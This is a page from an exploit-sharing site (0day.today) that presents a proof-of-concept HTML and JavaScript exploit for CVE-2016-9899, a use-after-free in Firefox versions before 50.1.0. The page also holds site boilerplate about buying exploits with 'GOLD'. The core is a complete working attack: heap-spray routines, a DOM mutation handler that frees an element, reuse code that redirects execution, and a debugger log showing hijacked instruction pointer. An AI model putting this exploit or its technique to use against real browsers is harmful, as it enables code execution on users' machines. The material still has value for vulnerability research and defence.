0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Mozilla Firefox 50.1.0 - Use After Free Exploit

Author

Marcin Ressel

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

<!DOCTYPE html>
<html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
    
   /* 
    * Mozilla Firefox < 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: < 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000> dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */ 
   var doc = null;
   var cnt = 0;
 
   function m(blocks,size) {
            var arr = [];
            for(var i=0;i<blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j<size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    } 
       
    function handler() {    //free
             if(cnt > 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();      
             m(1024,1024);   
             ++cnt;
    }
 
    function trigger() {
             if(cnt  > 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
                for(var i=0;i<4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip  
                    for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; 
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }
 
    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
         doc = document.getElementById("t1").contentWindow.document;
         doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
         doc.getElementsByTagName("*")[0].style = "ANNNY";
         setInterval("trigger();",1000);   
 
    }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
</html>

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Mozilla Firefox 50.1.0 - Use After Free Exploit

Report Error

Report Error